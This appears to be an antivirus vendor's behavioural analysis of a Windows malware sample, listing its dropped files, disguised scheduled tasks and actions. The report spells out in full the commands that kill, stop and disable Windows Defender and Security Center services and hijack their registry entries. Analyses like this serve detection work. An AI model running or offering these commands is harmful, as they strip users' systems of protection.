Техническая информация
- <SYSTEM32>\tasks\onedriveupdater
- <SYSTEM32>\tasks\systemlibrariesu
- [HKLM\SYSTEM\CurrentControlSet\Services\WinDefend] 'ImagePath' = '<SYSTEM32>\svchost.exe -k intlcsrNullGroup'
- [HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc] 'ImagePath' = '<SYSTEM32>\svchost.exe -k intlcsrNullGroup'
- Системный антивирус (Защитник Windows)
- Средство контроля пользовательских учетных записей (UAC)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
- '<SYSTEM32>\taskkill.exe' /F /IM "MsMpEng.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "NisSrv.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "MpCmdRun.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "SecHealthUI.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "smartscreen.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "MpDlpCmd.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "MpCopyAccelerator.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "SgrmBroker.exe"
- '<SYSTEM32>\net.exe' stop "WinDefend" /y
- '<SYSTEM32>\net.exe' stop "WdNisSvc" /y
- '<SYSTEM32>\net.exe' stop "WdNisDrv" /y
- '<SYSTEM32>\net.exe' stop "WdFilter" /y
- '<SYSTEM32>\net.exe' stop "WdBoot" /y
- '<SYSTEM32>\net.exe' stop "SecurityHealthService" /y
- '<SYSTEM32>\net.exe' stop "wscsvc" /y
- '<SYSTEM32>\net.exe' stop "Sense" /y
- '<SYSTEM32>\net.exe' stop "SgrmBroker" /y
- conout$
- %LOCALAPPDATA%\microsoft\windows\actioncentercache\windows-systemtoast-securityandmaintenance_10_0.png
- %TEMP%\fulltask.exe
- %TEMP%\corefire.exe
- %HOMEPATH%\desktop\anydesk\anydesk.exe
- nul
- %TEMP%\corefire.exe в %ALLUSERSPROFILE%\microsoft\windows\corefire.exe
- ClassName: '' WindowName: ''
- '%TEMP%\fulltask.exe'
- '%ALLUSERSPROFILE%\microsoft\windows\corefire.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "try { $tp = (Get-MpPreference).DisableTamperProtection; if ($tp -eq $false) { exit 1 } else { exit 0 } } catch { exit 0 }" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C move /Y "%TEMP%\corefire.exe" "%ALLUSERSPROFILE%\Microsoft\Windows\corefire.exe" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C schtasks /Query /TN "OneDriveUpdater" >nul 2>&1 || (schtasks /Create /TN "OneDriveUpdater" /TR "\"%ALLUSERSPROFILE%\\Microsoft\\Windows\\corefire.exe\"" /SC MINUTE /MO 1 /F >nul 2>&1 & power... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "MsMpEng.exe" >nul 2>&1 (со скрытым окном)
- '%WINDIR%\explorer.exe' "%HOMEPATH%\Desktop\AnyDesk"
- '<SYSTEM32>\schtasks.exe' /Query /TN "OneDriveUpdater"
- '<SYSTEM32>\schtasks.exe' /Create /TN "OneDriveUpdater" /TR "\"%ALLUSERSPROFILE%\\Microsoft\\Windows\\corefire.exe\"" /SC MINUTE /MO 1 /F
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "$task = Get-ScheduledTask -TaskName 'OneDriveUpdater'; $task.Settings.DisallowStartIfOnBatteries = $false; $task | Set-ScheduledTask"
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "NisSrv.exe" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "MpCmdRun.exe" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "SecHealthUI.exe" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "smartscreen.exe" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "MpDlpCmd.exe" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "MpCopyAccelerator.exe" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "SgrmBroker.exe" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Get-Process 'SecurityHealthSystray.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-Process 'SecurityHealthSystray.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }"
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Get-Process 'SecurityHealthService.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-Process 'SecurityHealthService.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }"
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Get-Process 'SecurityHealthHost.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-Process 'SecurityHealthHost.exe' -ErrorAction SilentlyContinue | ForEach-Object { $_.PriorityClass = 'Idle' }"
- '<SYSTEM32>\cmd.exe' /c net stop "WinDefend" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "WinDefend" /y
- '<SYSTEM32>\schtasks.exe' /Query /TN "SystemLibrariesU" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c sc stop "WinDefend" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "WinDefend"
- '<SYSTEM32>\cmd.exe' /C schtasks /Query /TN "SystemLibrariesU" >nul 2>&1 || (schtasks /Create /TN "SystemLibrariesU" /TR "\"%APPDATA%\Microsoft\Windows\SystemCertificatesData\Tasks\ProtectionWindowsHostProcess.exe\... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c sc config "WinDefend" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "WinDefend" start= disabled
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /Create /TN "SystemLibrariesU" /TR "\"%APPDATA%\Microsoft\Windows\SystemCertificatesData\Tasks\ProtectionWindowsHostProcess.exe\"" /SC MINUTE /MO 1 /F
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "$task = Get-ScheduledTask -TaskName 'SystemLibrariesU'; $task.Settings.DisallowStartIfOnBatteries = $false; $task | Set-ScheduledTask"
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\FailureActions" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\FailureActions" /f
- '<SYSTEM32>\cmd.exe' /c net stop "WdNisSvc" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "WdNisSvc" /y
- '<SYSTEM32>\cmd.exe' /c sc stop "WdNisSvc" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "WdNisSvc"
- '<SYSTEM32>\cmd.exe' /c sc config "WdNisSvc" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "WdNisSvc" start= disabled
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc\FailureActions" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc\FailureActions" /f
- '<SYSTEM32>\cmd.exe' /c net stop "WdNisDrv" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "WdNisDrv" /y
- '<SYSTEM32>\cmd.exe' /c sc stop "WdNisDrv" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "WdNisDrv"
- '<SYSTEM32>\cmd.exe' /c sc config "WdNisDrv" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "WdNisDrv" start= disabled
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv\FailureActions" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv\FailureActions" /f
- '<SYSTEM32>\cmd.exe' /c net stop "WdFilter" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "WdFilter" /y
- '<SYSTEM32>\cmd.exe' /c sc stop "WdFilter" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "WdFilter"
- '<SYSTEM32>\cmd.exe' /c sc config "WdFilter" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "WdFilter" start= disabled
- '<SYSTEM32>\cmd.exe' /C schtasks /End /TN "SystemLibrariesU" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\schtasks.exe' /End /TN "SystemLibrariesU"
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C schtasks /Change /TN "SystemLibrariesU" /DISABLE >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /Change /TN "SystemLibrariesU" /DISABLE
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\FailureActions" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\FailureActions" /f
- '<SYSTEM32>\cmd.exe' /c net stop "WdBoot" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "WdBoot" /y
- '<SYSTEM32>\cmd.exe' /c sc stop "WdBoot" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "WdBoot"
- '<SYSTEM32>\cmd.exe' /c sc config "WdBoot" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "WdBoot" start= disabled
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot\FailureActions" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot\FailureActions" /f
- '<SYSTEM32>\cmd.exe' /c net stop "SecurityHealthService" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "SecurityHealthService" /y
- '<SYSTEM32>\cmd.exe' /c sc stop "SecurityHealthService" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "SecurityHealthService"
- '<SYSTEM32>\cmd.exe' /c sc config "SecurityHealthService" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "SecurityHealthService" start= disabled
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\FailureActions" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\FailureActions" /f
- '<SYSTEM32>\cmd.exe' /c net stop "wscsvc" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "wscsvc" /y
- '<SYSTEM32>\cmd.exe' /c sc stop "wscsvc" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "wscsvc"
- '<SYSTEM32>\cmd.exe' /c sc config "wscsvc" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "wscsvc" start= disabled
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\FailureActions" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\FailureActions" /f
- '<SYSTEM32>\cmd.exe' /c net stop "Sense" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "Sense" /y
- '<SYSTEM32>\cmd.exe' /c sc stop "Sense" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "Sense"
- '<SYSTEM32>\cmd.exe' /c sc config "Sense" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "Sense" start= disabled
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense\FailureActions" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense\FailureActions" /f
- '<SYSTEM32>\cmd.exe' /c net stop "SgrmBroker" /y >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop "SgrmBroker" /y
- '<SYSTEM32>\cmd.exe' /c sc stop "SgrmBroker" >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop "SgrmBroker"
- '<SYSTEM32>\cmd.exe' /c sc config "SgrmBroker" start= disabled >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\sc.exe' config "SgrmBroker" start= disabled
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v Start /t REG_DWORD /d 4 /f
- '<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker\DependOnService" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker\DependOnService" /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v ImagePath /t REG_EXPAND_SZ /d "<SYSTEM32>\svchost.exe -k intlcsrNullGroup" /f >nul 2>&1 (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true" (со скрытым окном)
- '%TEMP%\fulltask.exe' (со скрытым окном)
- '%ALLUSERSPROFILE%\microsoft\windows\corefire.exe' (со скрытым окном)